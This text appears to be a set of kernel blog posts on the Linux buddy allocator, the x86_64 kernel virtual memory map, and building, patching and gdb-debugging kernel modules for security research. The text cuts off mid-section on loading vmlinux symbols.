I figured I should get into the habit of promoting some kernel development hijinx and explore some of the APIs for the topics we discuss where relevant.

Let’s dive in then and highlight some of the API exposed to kernel developers for use in modules & device drivers. All defs can be found in [/include/linux/gfp.h](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/gfp.h):

alloc_pages(gfp_mask, order): Allocate 2order pages (one physically contiguous chunk from the order N freelist) and return a struct page address
alloc_page(gfp_mask): macro for alloc_pages(gfp_mask, 0)
__get_free_pages(gfp_mask, order) and __get_free_page(gfp_mask) mirror the above functions, except they return a virtual address to the allocation as opposed to a struct page
For freeing options include: __free_page(struct page *page), __free_pages(struct page *page, order) and free_page(void *addr)
Plenty more to see if you take a browse of [/include/linux/gfp.h](https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/gfp.h)

Most of that should be fairly familiar at this point, except the gfp_mask, which we haven’t covered. The gfp_mask is a set of GFP (Get Free Page) flags which lets us configure the behaviour of the allocator and are used across the kernels memory management stuff.

The inline documentation[1] already does a good job at covering the different flags, so I won’t rehash that here. My experience has mainly seen GFP_KERNEL, GFP_KERNEL_ACCOUNT[2], GFP_ATOMIC.

Despite a flexible API for different allocation use cases and requirements, they all ultimately call the real MVP, __alloc_pages():

/*
 * This is the 'heart' of the zoned buddy allocator.
 */
struct page *__alloc_pages(gfp_t gfp, unsigned int order, int preferred_nid,
							nodemask_t *nodemask)

/mm/page_alloc.c

We’ve already covered a lot of ground in this post, so I’ll leave it as an exercise to the reader to take a look at this function to see what we’ve covered so far in actual code :)

I’ll also use this as an opportunity to plug my long neglected repo (but I plan to push some demos for Linternals posts up too, maybe), “lmb” aka Linux Misc driver Boilerplate; a very lightweight kernel module boilerplate for bootstraping kernel fun.

GitHub - sam4k/lmb: Very lightweight kernel module boilerplate for kernel development/testing.

https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/gfp.h#L271
@poppop7331 and @vnik5287 recently did a cool blog post covering modern heap exploitation, including the implications of GFP_KERNEL_ACCOUNT in recent kernel versions :)

Pros & Cons

Before we wrap up, and to give some context on the next section, let’s take what we’ve learned about the buddy allocator and highlight some of it’s pros and cons.

First of all, due to the nature of the buddy system algorithm behind things, the buddy allocator is fast to (de)allocate memory. Furthermore, being able to split and remerge chunks on the go, there is little external fragmentation (this is where there’s enough free memory to serve a request, just not in one contiguous chunk).

There’s also other perf benefits, that we won’t dive into here, to providing physically contiguous memory and guaranteeing cache aligned memory blocks.

The main downside here is the internal fragmentation, where the chunk of memory allocated is bigger than necessary, leaving a portion of it unused. Due to the fixed sizes, determined by 2order pages, if a request falls just too big for the previous order, we’re gonna have a great deal of space wasted. Not to mention the smallest allocation is 1 page.

tl;dr: fast, contiguous allocations, low external fragmentation, bad internal fragmentation

Wrapping Up

Memory allocation and management is an extremely complex topic with a lot of nuance and complexity which, as we saw, extends down to the hardware level.

Hopefully this has been a useful primer on one of the fundamentals to kernel memory allocation, the buddy allocator:

We covered the role of memory allocators briefly, before learning that the buddy allocator acts as a fundamental memory allocation mechanism within the Linux kernel
We learned at a high level about the buddy system algorithm behind the buddy allocator, with some peaks into the actual kernel code from the mm system
Finally we pieced together our understanding with some extras on how memory is managed by the kernel, it’s API and the pros/cons of the buddy allocator

Next Time!

The fun doesn’t end here, don’t you worry! We’ve just scratched the surface. I hope you’re ready to expand your repertoire of acronyms cos next time we’ll be exploring the wonderful world of slab allocators: SLAB, SLUB & SLOB.

Sitting above the buddy allocator, the slab allocator is another fundamental aspect of memory allocation and management in the Linux kernel, addressing the internal fragmentation problems of the buddy allocator - but that’s for next time!

Thanks for reading, and as always feel free to @me if you have any questions, suggestions or corrections :)

exit(0);

Linternals: The Kernel Virtual Address Space

sam4k — Tue, 10 May 2022 19:30:00 +0000

Alright, we really made it to part 3 eh? Not bad! Before we dive straight in, let’s quickly go over what we covered in the last part on the user virtual address space:

Very brief overview, with some examples, of using procfs for introspection
The various mappings that make up a typical user virtual address space
Which syscalls userspace programs make use of to set up their virtual address space
Finally tying up some extras with how threading & ASLR fit into this picture

This time we’ll be pivoting our attention towards the omnipresent kernel virtual address space, where all the true power resides, so let’s get stuck into chapter 5!

0x05 Kernel Virtual Address Space
Next Time!

0x05 Kernel Virtual Address Space

Casting our minds back to part 1, we’ll recall that:

Each process has it’s own, sandboxed virtual address space (VAS)
The VAS is vast, spanning all addressable memory
This VAS is split between the User VAS & Kernel VAS[1]

As we touched on in part 1, and more so in part 2, to even set up it’s user VAS a process needs the kernel to carry out a series of syscalls (brk(), mmap(), execve() etc.)[2].

This is because our userspace is running in usermode (i.e. unprivileged code execution) and only the kernel is able to carry out important, system-altering stuff (right??).

So if we’re in usermode and we need the kernel to do something, like mmap() some memory for us, then we need to ask the kernel to do it for us and we do this via syscalls.

Essentially, a syscall acts as a interface between usermode and kernelmode (privileged code execution), only allowing a couple of things to cross over from usermode: the syscall number & it’s arguments.

This way the kernel can look up the function corresponding to the syscall number, sanitise the arguments (the userspace has no power here after all) and if everything looks good, it can carry out the privileged work, return to the syscall handler which can transition back to usermode, only allowing one thing to cross over: the result of the syscall.

This is all a roundabout way of broaching the question: we understand the userspace, but when we make a syscall[3], what is it running and how does it know where to find it?

And THAT is where the kernel virtual address space comes in. Got there eventually, right?

The VAS is often so vast (e.g. on 64-bit systems), that rather than splitting the entire address space an upper & lower portion are assigned to the kernel and user respectively, with the majority in between being non-canonical/unused addresses.
We touched more on syscalls back in part 1, “User-mode & Kernel-mode”
In the future I might dedicate a full post (or 3 lol) to the syscall interface, so if that’s something you’d be into, feel free to poke me on Twitter

One Mapping To Rule Them All

Okay, so I know we’re all eager to dig around the kernel VAS, but it’s worth noting a fairly fundamental difference here: while each process has it’s own unique user VAS, they all share the same kernel VAS.

Huh? What exactly does this mean? Well, to put simply, all our processes are interacting with the same kernel, so each process’s kernel VAS maps to the same physical memory.

As such, any changes within the kernel will be reflected across all processes. It’s important to note, and we’ll cover the why in more detail later, when we’re in usermode we have no read/write access to this kernel virtual address space.

This is an extremely high-level overview of the topic and the actual details will vary based on architecture & security mitigations, but for now just remember that all processes share the same kernel VAS.

Kernel Virtual Memory Map

Unfortunately things aren’t going to be as tidy and straightforward as our tour of the user virtual address space. The contents of kernelspace varies depending on architecture and unfortunately there isn’t easy-to-visualise introspection via procfs.

As I’ve mentioned before in Linternals, I’ll be focusing on x86_64 when architecture specifics come into play. So although we don’t have procfs, we do have kernel docs!

[Documentation/x86/x86_64/mm.txt](https://www.kernel.org/doc/Documentation/x86/x86_64/mm.txt), specifically, provides a /proc/self/maps-esque breakdown of the x86_64 virtual memory map, including both UVAS & KVAS; which is perfect for us[1]:

========================================================================================================================
    Start addr    |   Offset   |     End addr     |  Size   | VM area description
========================================================================================================================
                  |            |                  |         |
 0000000000000000 |    0       | 00007fffffffffff |  128 TB | user-space virtual memory, different per mm
__________________|____________|__________________|_________|___________________________________________________________
                  |            |                  |         |
 0000800000000000 | +128    TB | ffff7fffffffffff | ~16M TB | ... huge, almost 64 bits wide hole of non-canonical
                  |            |                  |         |     virtual memory addresses up to the -128 TB
                  |            |                  |         |     starting offset of kernel mappings.
__________________|____________|__________________|_________|___________________________________________________________
                                                            |
                                                            | Kernel-space virtual memory, shared between all processes:
____________________________________________________________|___________________________________________________________
                  |            |                  |         |
 ffff800000000000 | -128    TB | ffff87ffffffffff |    8 TB | ... guard hole, also reserved for hypervisor
 ffff880000000000 | -120    TB | ffff887fffffffff |  0.5 TB | LDT remap for PTI
 ffff888000000000 | -119.5  TB | ffffc87fffffffff |   64 TB | direct mapping of all physical memory (page_offset_base)
 ffffc88000000000 |  -55.5  TB | ffffc8ffffffffff |  0.5 TB | ... unused hole
 ffffc90000000000 |  -55    TB | ffffe8ffffffffff |   32 TB | vmalloc/ioremap space (vmalloc_base)
 ffffe90000000000 |  -23    TB | ffffe9ffffffffff |    1 TB | ... unused hole
 ffffea0000000000 |  -22    TB | ffffeaffffffffff |    1 TB | virtual memory map (vmemmap_base)
 ffffeb0000000000 |  -21    TB | ffffebffffffffff |    1 TB | ... unused hole
 ffffec0000000000 |  -20    TB | fffffbffffffffff |   16 TB | KASAN shadow memory
__________________|____________|__________________|_________|____________________________________________________________
                                                            |
                                                            | Identical layout to the 56-bit one from here on:
____________________________________________________________|____________________________________________________________
                  |            |                  |         |
 fffffc0000000000 |   -4    TB | fffffdffffffffff |    2 TB | ... unused hole
                  |            |                  |         | vaddr_end for KASLR
 fffffe0000000000 |   -2    TB | fffffe7fffffffff |  0.5 TB | cpu_entry_area mapping
 fffffe8000000000 |   -1.5  TB | fffffeffffffffff |  0.5 TB | ... unused hole
 ffffff0000000000 |   -1    TB | ffffff7fffffffff |  0.5 TB | %esp fixup stacks
 ffffff8000000000 | -512    GB | ffffffeeffffffff |  444 GB | ... unused hole
 ffffffef00000000 |  -68    GB | fffffffeffffffff |   64 GB | EFI region mapping space
 ffffffff00000000 |   -4    GB | ffffffff7fffffff |    2 GB | ... unused hole
 ffffffff80000000 |   -2    GB | ffffffff9fffffff |  512 MB | kernel text mapping, mapped to physical address 0
 ffffffff80000000 |-2048    MB |                  |         |
 ffffffffa0000000 |-1536    MB | fffffffffeffffff | 1520 MB | module mapping space
 ffffffffff000000 |  -16    MB |                  |         |
    FIXADDR_START | ~-11    MB | ffffffffff5fffff | ~0.5 MB | kernel-internal fixmap range, variable size and offset
 ffffffffff600000 |  -10    MB | ffffffffff600fff |    4 kB | legacy vsyscall ABI
 ffffffffffe00000 |   -2    MB | ffffffffffffffff |    2 MB | ... unused hole
__________________|____________|__________________|_________|___________________________________________________________

Line 5: We’ve touched on this previously, the lower portion of our virtual addresses space[2] makes up the userspace. Size varies per architecture.

Line 8: Remember how the virtual address spans every possible address, which is A LOT? As a result, the majority of this is non-canonical, unused space.

Line 16: My understanding is the guard hole initially existed to prevent accidental accesses to the non-canonical region (which would cause trouble), nowadays the space is also used to load hypervisors into.

Line 17: This will make more sense after we cover virtual memory implementation, but the per-process Local Descriptor Table describes private memory descriptor segments[3].

When Page Table Isolation (a mitigation, see below) is enabled, the LDT is mapped to this kernelspace region to mitigate the contents being accessed by attackers.

Line 18: Defined by __PAGE_OFFSET_BASE, the “physmap” (aka lowmem) can be seen as the start of the kernelspace proper. It is used as a 1:1 mapping of physical memory.

To recap, virtual addresses can be mapped to somewhere in physical memory. E.g. if we load a library into our virtual address space, the virtual address it’s been mapped to actual points to some physical memory where that’s been loaded to.

In another process, with it’s own virtual address space, that same virtual address may be mapped to a completely different physical memory address.

Unlike typical virtual addresses (we’ll touch on how they’re translated), addresses in the physmap region are called kernel logical addresses. Any given kernel logical address is a fixed offset ([PAGE_OFFSET](https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/page_types.h#L36)) from the corresponding physical address.

E.g. PAGE_OFFSET == physical address 0x00, PAGE_OFFSET+0x01 == physical address 0x01 etc. etc.

Line 19: Not much more to say about these, other than it’s an unused region!

Line 20[4]: Defined by VMALLOC_START and VMALLOC_END, this virtual memory region is reserved for non-contiguous physical memory allocations via the [vmalloc()](https://elixir.bootlin.com/linux/v5.17.5/source/include/linux/vmalloc.h#L146) family of kernel functions (aka highmem region).

This is similar to how we initially understood virtual memory, where two contiguous virtual addresses in the vmalloc region may not necessarily map to two contiguous physical memory addresses (unlike physmap which we just covered).

This region is also used by [ioremap()](https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/io.h#L207), which doesn’t actually allocate physical memory like vmalloc() but instead allows you to map a specified physical address range. E.g. allocating virtual memory to map I/O stuff for your GPU.

To oversimplify, though we’ll expand on later, as this region isn’t simply physical address = logical address - PAGE_OFFSET, there’s more overhead behind the scenes using vmalloc() which uses virtual addressing than say kmalloc(), which returns addresses from the physmap region.

Line 21: Another unused memory region!

Line 22[5]: Defined by [VMEMMAP_START](https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/pgtable_64_types.h#L135), this region is used by the [SPARSEMEM](https://www.kernel.org/doc/html/latest/vm/memory-model.html) memory model in Linux to map the vmemmap. This is a global array, in virtual memory, that indexes all the chunks (pages) of memory currently tracked by the kernel.

Line 23: Aaand another unused memory region!

Line 24[6]: The Kernel Address Sanitiser (KASAN) is a dynamic memory error detector, used for finding use-after-free and out-of-bounds bugs. When enabled, CONFIG_KASAN=y, this region is used as shadow memory by KASAN.

This basically means KASAN uses this shadow memory to track memory state, which it can then compare later on with the original memory to make sure there’s no shenanigans or undefined behaviour going on.

Line 30: You get the idea, unused.

Line 31: Straight from the comments, defined by [CPU_ENTRY_AREA_BASE](https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/pgtable_64_types.h#L157), “cpu_entry_area is a percpu region that contains things needed by the CPU and early entry/exit code”[7]. The [struct cpu_entry_area](https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/cpu_entry_area.h#L90) can share more insights on its role.

CPU_ENTRY_AREA_BASE is also used by [vaddr_end](https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/mm/kaslr.c#L41), which along with vaddr_start marks the virtual address range for Kernel Address Space Layout Randomization (KASLR).

Line 32: Yep, unused region.

Line 33: Enabled with CONFIG_X86_ESPFIX64=y, this region is used to, and I honestly don’t blame you if this makes no sense yet, fix issues with returning from kernelspace to userspace when using a 16-bit stack…

Again, the comments can be insightful here, so feel free to take a gander at the implementation in [arch/x86/kernel/espfix_64.c](https://elixir.bootlin.com/linux/latest/source/arch/x86/kernel/espfix_64.c).

Line 34: Another unused region.

Line 35: Defined by [EFI_VA_START](https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/pgtable_64_types.h#L159), this region unsurprinsgly is used for EFI related stuff. This is the same Extensible Firmware Interface we touch on in the (currently unfinished, oops) Linternals series on The (Modern) Boot Process.

Line 36: More unused memory.

Line 37: This region is used as a 1:1 mapping of the kernel’s text section, defined by [__START_KERNEL_map](https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/page_64_types.h#L50). As we mentioned before, the kernel image is formatted like any other ELF, so has the same sections.

This is where we find all the functions in your kernel image, which is handy for debugging! In this instance, if we’re debugging an x86_64 target we can get a rough idea of what we’re looking atjust from the address.

If we see the 0xffffffff8....... then we know we’re looking at the text section!

Line 38: Any dynamically loaded (think insmod) modules are mapped into this region, which sits just other the kernel text mapping as we can see in the definition:

#define MODULES_VADDR (__START_KERNEL_map + KERNEL_IMAGE_SIZE)

Line 39: Defined by [FIXADDR_START](https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/fixmap.h#L151), this region is used for “fix-mapped” addresses. These are special virtual addresses which are set/used at compile-time, but are mapped to physical physical memory at boot.

The [fix_to_virt()](https://elixir.bootlin.com/linux/v5.17.6/source/include/asm-generic/fixmap.h#L30) family of functions are used to work with these special addresses.

Line 40: We actually snuck this in to our last part! To recap, this region is:

a legacy mapping that actually provided an executable mapping of kernel code for specific syscalls that didn’t require elevated privileges and hence the whole user -> kernel mode context switch. Suffice to say it’s defunct now, and calls to vsyscall table still work for compatibility, but now actually trap and act as a normal syscall

Line 41: Our final unused memory region!

The eagle-eyed will note there’s a couple of diagrams in mm.txt, one for 4-level page tables and one for 5-level. We’ll touch on what this means in the next section, for now just know that 4-level is more common atm
Specifically, depending on the arch, the most significant N bits are always 0 for userspace and 1 for kernelspace; on x86_64 this is bits 48-63. This leaves 248 bits of addressing for both userspace and kernelspace (128TB)
https://en-academic.com/dic.nsf/enwiki/1553430
https://www.oreilly.com/library/view/linux-device-drivers/0596000081/ch07s04.html
https://blogs.oracle.com/linux/post/minimizing-struct-page-overhead
https://www.kernel.org/doc/html/latest/dev-tools/kasan.html
https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/cpu_entry_area.h#L90

Wrapping Up

We did it! We’ve covered all the regions described in the kernel x86_64 4-page (we’ll get on that in the next section) virtual memory map!

Hopefully there was enough detail here to provide some interesting context, but not so much that you might have well been reading the source. For the more curious, we’ll be focusing more on implementation details in the next part.

Digging Deeper

If you’re interested in exploring some of these concepts yourself, don’t be scared away by the source! Diving into some of the #define’s and symbols we’ve mentioned so far and rooting around can be a good way to dive in. bootlin’s Elixr Cross Referencer is easy to use and you can jump about the source in your browser.

Additionally, playing around with drgn (live kernel introspection), gdb (we covered getting setup in this post) and coding is a fun way to get stuck in and explore these memory topics.

Next Time!

After 3 parts, we’ve laid a solid foundation for our understanding of what virtual memory is and the role it plays in Linux; both in the userspace and kernelspace.

Armed with this knowledge, we’re in a prime position to begin digging a little deeper and getting into some real Linternals as we take a look at how things are actually implemented.

Next time we’ll begin to take a look, at both a operating system and hardware level, how this all works. I’m not going to pretend I know how many parts that’ll take!

Down the line I would also like to close this topic by bringing everything we’ve learnt together by covering some exploitation techniques and mitigations RE virtual memory.

Thanks for reading!

exit(0);

Patching, Instrumenting & Debugging Linux Kernel Modules

sam4k — Fri, 15 Apr 2022 16:13:50 +0000

So not long ago I found myself having to test a fix in a Linux networking module as part of the coordinated vulnerability disclosure I posted about recently.

Maybe my Google-fu wasn’t on point, but it wasn’t immediately clear what the best approach was, so hopefully this post can provide some direction for anyone interested in quickly patching, or instrumenting, Linux kernel modules.

Now, if we’re talking about patching and instrumentation in the Linux kernel, I’d be remiss not to at least touch on some debugging basics as well, right? So hopefully between those three topics we should be able to cover some good ground in this post!

❗

This post ended up being quite long, so if you like a narrative and hearing the why behind the how, please continue! But for brevity I’ve also included the essentials my repo over at sam4k/linux-kernel-resources.

Preamble
- Kernel Module?
Getting Setup
Getting Stuck In
FAQ
Postamble

Preamble

This post is written in the context of kernel security research, which might deviate from other use cases, so bear that in mind when reading this post.

When finding a vuln, or looking into an existing bug, I’ll want to set up a representative environment to play around with it. This basically just means setting up an Ubuntu VM (representative of a typical in-the-wild box) with a vulnerable kernel version.

The only real hard requirement I assume, is that you’re doing your kernel stuff in a VM; as this’ll make debugging the kernel a lot easier down the line.

Kernel Module?

In the early, early days (<1995) the Linux kernel was truly monolthic. Any functionality needed to be built into the base kernel at build time and that was that.

Since then, Loadable Kernel Modules (LKMs) have improved the flexibility of the Linux kernel, allowing features to be implemented as modules which can either be built into the base kernel or built as separate, loadable modules.

These can be loaded into, and unloaded from, kernel memory on demand without requiring a reboot or having to rebuild the kernel. Nowadays LKMs are used for device drivers, filesystem drivers, network drivers etc.

Getting Setup

Alright, let’s get things setup shall we? In this section I’ll talk about how to get to a position where we’re able to make changes to a kernel module, rebuild it and install it.

There are probably a lot of different ways to do this - some quicker, some hackier and some context specific. While I’ll touch on some shortcuts in the next section, in my experience the easiest way to avoid a headache is just starting from a fresh kernel build.

So that’s what we’re going to do! Buckle up, let’s see if I can keep this brief. First I’ll quickly cover how to build the kernel and then move onto patching specific modules.

Building The Kernel

First things first, make sure you grab the necessary dependencies for building the kernel:

$ sudo apt-get install git fakeroot build-essential ncurses-dev xz-utils libssl-dev bc flex libelf-dev bison dwarves

With that sorted, download the kernel version you’re wanting to play with from kernel.org:

$ wget https://cdn.kernel.org/pub/linux/kernel/v5.x/linux-5.17.tar.xz

If you’re not sure what kernel version to go for, just pick one closest to your current environment, which you can check via the cmd uname -r; don’t worry about patch versions or anything past the first two number, we ain’t got no time for that.

Next let’s extract the kernel source into our current dir and cd into it after:

$ tar -xf linux-5.17.tar.xz && cd linux-5-17

Now we need to configure our kernel. The kernel configuration is stored in a file named .config, in the root of the kernel source tree (aka where we just cd’d into).

On Debian-based distros you should be able to find your config at /boot/config-$(uname -r) or similar; on my Arch box it’s compressed at /proc/config.gz:

$ cp /boot/config-$(uname -r) .config

This file contains all the configuration options for your kernel; if you want to play around with these you can use make menuconfig to tweak your config. Speaking of tweaking your config, you may want to make some changes:

On Ubuntu, you’ll likely encounter some key related issues if you try to build using their config, so set the following config values in your .config: CONFIG_SYSTEM_TRUSTED_KEYS="", CONFIG_SYSTEM_REVOCATION_KEYS=""
Given there may be patching and debugging involved down the line, it might be worth taking the opportunity to enable debugging symbols with [CONFIG_DEBUG_INFO](https://cateee.net/lkddb/web-lkddb/DEBUG_INFO.html)=Y && [CONFIG_GDB_SCRIPTS](https://cateee.net/lkddb/web-lkddb/GDB_SCRIPTS.html)=Y ; you can enable this easily by using the helper ./scripts/config -e DEBUG_INFO -e GDB_SCRIPTS

With .config ready, let’s crack on. By using oldconfig instead of menuconfig we can avoid the ncurses interface and just update the kernel configuration using our .config (it just means we may get some prompts during the make process for new options):

$ make oldconfig

Now we’re ready to start building the kernel, and depending on your system and the .config we’ve copied over, this can take a while, so fire all CPU cores:

$ make -j$(nproc)

Next up, we can start installing our freshly built kernel. First up are the modules, which will typically be installed to /lib/modules/. So, to install our modules we’ll go ahead and run:

$ sudo make modules_install

Finally we’ll install the kernel itself; the follow command will do all the housekeeping required to let us select the new kernel from our bootloader:

$ sudo make install

And voila! Just like that we’ve built our Linux kernel from source, nabbing the config from our current environment, and we’re ready to do some tinkering!

Module Patching

Okay, now we have a clean environment to work with and can start tinkering! Because we’ve built the kernel from source, we know we’re building our patched modules in the exact same development environment as the kernel we’re installing them into.

While the initial build can be lengthy, it’s straightforward and we avoid the headache of out-of-tree module taints, signing issues and other finicky version-mismatch related issues.

Instead, we can make whatever changes we intend to make to our module and then run much the same commands we did during the initial install, only targeting our patched module(s). For example, for CVE-2022-0435 I tested a patches in net/tipc/monitor.c, so to rebuild and install my patched module I’d simply run:

$ make M=net/tipc
$ sudo make M=net/tipc modules_install

I’m then able to go ahead and re/load tipc and we’re good to go! Easy as that.

Shortcuts & Alternatives

As some of you may already be painfully aware, building a full-featured kernel can actually take some time, especially in a VM with limited resources.

Minimal Configs

So to speed things up dramatically, if you’re familiar with the module(s) you’re going to be looking at, a more efficient approach is to start from a minimal config and enable the bare minimum features required for your testing environment.

For example $ make defconfig will generate a minimal default config for your arch, and then you can use $ make menuconfig to make further adjustments.

Skip Building Altogether

Depending on your requirements, you can just avoid building altogether:

if you just want to do some debugging, you could pull debug symbols from your distribution repo (see section on symbols below)
you may be able to fetch source from your distro repos, where you can then patch and build modules from there
if you don’t need to worry about module signing/taint, and you’re happy to get messy, there’s hackier ways to do all this too

Getting Stuck In

Now that we’ve got our kernel dev environment setup, it’s time to get stuck in! I’ll briefly touch on generating patches, because why not, and instrumentation (though I’m not as familiar with this topic) before finally covering how we can debug kernel modules.

Patch Diffs

Disclaimer, if you want to submit any patches to the kernel formally, then definitely check out this comprehensive kernel doc on the various dos & donts of submitting patches.

That said, we’re just playing around here! Plus I don’t think it actually mentions the command in that particular doc. Anyway, I digress, we can run the following commands to generate a simple patch diff between two files:

$ diff -u monitor.c monitor_patched.c 
--- monitor.c   2021-03-11 13:19:18.000000000 +0000
+++ monitor_patched.c 2022-04-06 19:25:27.449661568 +0100
@@ -503,8 +503,10 @@
        /* Cache current domain record for later use */
        dom_bef.member_cnt = 0;
        dom = peer->domain;
-       if (dom)
+       if (dom) {
+               printk("printk debugging ftw!\n")
                memcpy(&dom_bef, dom, dom->len);
+       }
 
        /* Transform and store received domain record */
        if (!dom || (dom->len < new_dlen)) {

Where -u tells diff to use the unified format, which provides us with 3 lines of unified context (this is the standard, but N lines of context can be specified with -u N).

This unified format provides a line-by-line comparison of the given files, letting us know what’s changed from one to another:

Line 2 is part of the patch header, prefixed with ---, and tells us the original file, date created and timezone offset from UTC (thanks @kfazz01!)
Line 3 is also part of the header, prefixed with +++, and tells us the new file, date created and timezone offset from UTC (thanks @kfazz01!)
Line 4, encapsulated by @@, defines the start of “hunk” (group) of changes in our diff; sticking to - for original and + for new, -503,8 tells us this hunk is starting from line 503 in monitor.c and shows 8 lines. +503,10 means the hunk also starts from line 503 in monitor_patched.c but shows 10 lines (which checks out as we removed 1 and added 3).
Lines 5-7 & 13-15 are our 3 lines of unified context, just to give us some idea of what’s going on around the lines we’ve changed
Lines 8-12 then are, by process of elimination, the lines we’ve changed. Changing things up, now - prefixes lines we’ve removed (i.e in monitor.c but no longer in monitor_patched.c) and + prefixes lined we’ve added to monitor_patched.c

So there’s a quick ramble on patch diffs. It’s as easy as that. We can also do diffs on entire directly/globs of files:

$ diff -Naur net/tipc/ net/tipc_patched/

Where -N treats missing files as empty, -a treats all files as text, -r recursively compares subdirs and -u is the same as before.

If we want to save these patches and apply them down the line, we can redirect the output into a file and then apply it to the original:

$ diff -u monitor.c monitor_patched.c > monitor.patch
$ patch -p0 < monitor.patch 
patching file monitor.c

When we pass patch a patch file, it expects and argument -pX where X defines how many directory levels to strip from our patch header. Our was like --- monitor.c, so we include -p0 as there’s 0 dir levels to strip!

Instrumentation

Memes aside, printf() does the job in your own C projects, printk() is just the kernel-land equivalent[1] and sometime’s a cheeky printk("here") is all you need.

Using the patching approach we mentioned above, sometimes the easiest way to debug or trace execution isn’t to set up some complication framework but simply to sprinkle in some printk()’s and rebuild your module and voila!

And well, that’s the extent of my practical kernel instrumentation knowledge. But I’d feel bad making a whole section just to meme printk(), so while I can’t expand on them fully, here are a couple of other avenues for kernel instrumentation:

kprobes

kprobes enable you to dynamically break into any kernel routine and collect debugging and performance information non-disruptively. You can trap at almost any kernel code address, specifying a handler routine to be invoked when the breakpoint is hit — kernel.org/doc

kprobes provide a fairly comprehensive API for your instrumentation needs, however the flip side is that is does require some light kernel development skills (perhaps a good intro task to kernel development??) to get stuck in.

ftrace

ftrace, or function tracer, is “an internal tracer designed to help out developers and designers of systems to find what is going on inside the kernel […] although ftrace is typically considered the function tracer, it is really a frame work of several assorted tracing utilities.” [2].

ftrace is actually quite interesting, as unlike similarly named (but not to be confused) tools like strace, there is no usermode binary to interact with the kernel component. Instead, users interact with the tracefs file system.

For the sake of brevity, if you’re interested in checking out ftrace, here is an introductory guide by Gaurav Kamathe on opensource.com:

Analyze the Linux kernel with ftrace

eBPF??

Okay, this might be a bit of a rogue one. Quick disclaimer being I’ve unfortunately not found the time, despite it being high up on my list, to properly play with eBPF. So touch any statements RE eBPF features with a pinch of salt!

That said, to summarise (I think I got this bit right), eBPF is a kernel feature introduced in 4.x that allows privileged usermode applications to run sandboxed code in the kernel.

I’m particularly interested in seeing the limits of its application, particularly in spaces such as detection, rootkits and debugging; for something original focused around networking.

Although, RE instrumentation & debugging, I’m not sure how much extra mileage eBPF would be able to provide. The eBPF bytecode runs in a sandboxed environment within the kernel, and as far as I’m aware can’t alter kernel data.

That said, from a instrumentation perspective we can still do some interesting tracing. For example, we can attach to one of our kprobes and read function args & ret values.

Anyway, perhaps just some food-for-thought, but I’ll stop rambling! I’ll drop a couple of links below to existing publications on eBPF instrumentation/debugging [3].

The reason it’s printk(), and not the classic printf() we usually find in C, as the C standard library isn’t available in kernel mode; so the k in printk() let’s us know we’re using the kernel-land implementation.
https://www.kernel.org/doc/Documentation/trace/ftrace.txt
Debugging Linux issues with eBPF (USENIX LISA18)
Kernel analysis using eBPF

Debugging

Working with something as complex as the Linux kernel, you’ll inevitably find yourself resonating with the above gif, and that’s alright! That said, getting a smooth debugging workflow setup can go a long ways to alleviating the confusion.

Setting up good debugging environment means you can set breakpoints, allowing you to pause kernel execution at moments of interest, as well as inspect, and even change, registers and memory! There’s also scope for scripting various elements of this process too.

GDB Debugging Stub

Remember about 2000 words ago I mentioned the only real assumption I was going to make is that you’re doing your kernel testing/shenanigans in a VM?

It turns out that trying to debug the kernel you’re running is… tricky. So besides snapshots and various other QoL features, a big pro to using VMs is the ability to remotely debug them at the kernel-level from our host (or another guest) using a debugger[1].

The debugger in question, gdb, or the GNU Project debugger[1], is a portable debugger that runs on many UNIX-like systems and is basically the defacto Linux kernel debugger (@ me).

Thanks to gdbstubs[2], sets of files included by the virtualisation software (VMWare, QEMU etc.) in guests, we’re able to remotely debug our guest kernel with much the same functionality we’d expect from userland debugging: breakpoints, viewing/setting registers and memory etc. etc.[3]

I’ll use this opportunity to plug GEF (GDB Enhanced Features) cos let’s not forget gdb is like 36 years old and your boy needs some colours up in his CLI. Beyond just colours, gef has a great suite of quality-of-life features that just make the debugging workflow easier.

❗

Note that future GDB snippets will be using GEF, definitely not in an attempt to convert you, so don’t be scared by the `gef➤` prompt; it’s all the same program.

Anyway, enough rambling, let’s take a look at getting kernel debugging setup on our VM:

Enable the gdbstub on your guest[4]; typically this will listen on an interface:port you specify on the host. E.g. QEMU by default listens on localhost:1234.
Now on your host, or another guest that can reach the listening interface on your host, you can spin up and gdb[5] and connect:

$ gdb
...
gef➤ target remote :1234 
gef➤ # you can omit localhost, so just :1234 works too

And just like that, you’re now remotely debugging the Linux kernel - awesome, right? Except if you’ve just fired up gdb and connected like the snippet above, you’re probably seeing something like this:

gef➤  target remote :12345
Remote debugging using :12345
warning: No executable has been specified and target does not support
determining executable automatically.  Try using the "file" command.
0xffffffffa703f9fe in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
[!] Command 'context' failed to execute properly, reason: 'NoneType' object has no attribute 'all_registers'
gef➤  info reg
...
rip            0xffffffffa703f9fe  0xffffffffa703f9fe

Huh, so we’ve connected and it looks like we’ve trapped execution at 0xffffffffa703f9fe, but gdb has no idea where we are… This does not bode well for a productive debugging session; so let’s look at how to fix that!

vmlinux, symbols & kaslr

So although our gdb has managed to make contact with the gdbstub on our guest, it’s far from omnipotent. It can interact with memory and read the registers, as it understands the architecture, however it doesn’t know about the kernel’s functions and data structures.

Unfortunately for us that’s the whole reason we’re doing kernel debugging, to debug the kernel! Luckily though, it’s fairly simple to tell gdb everything it needs to know.

If you’ve you’ve read my Linternals: The (Modern) Boot Process [0x02], you’ll know that there’s file called vmlinux containing the decompressed kernel image as a statically linked ELF. Just like debugging a userland binary, we can load this vmlinux into gdb and it’s able to interpret it without any dramas.

Importantly, though, just like userland debugging we want to make sure we load a vmlinux with debugging symbols included, there’s a couple options for this:

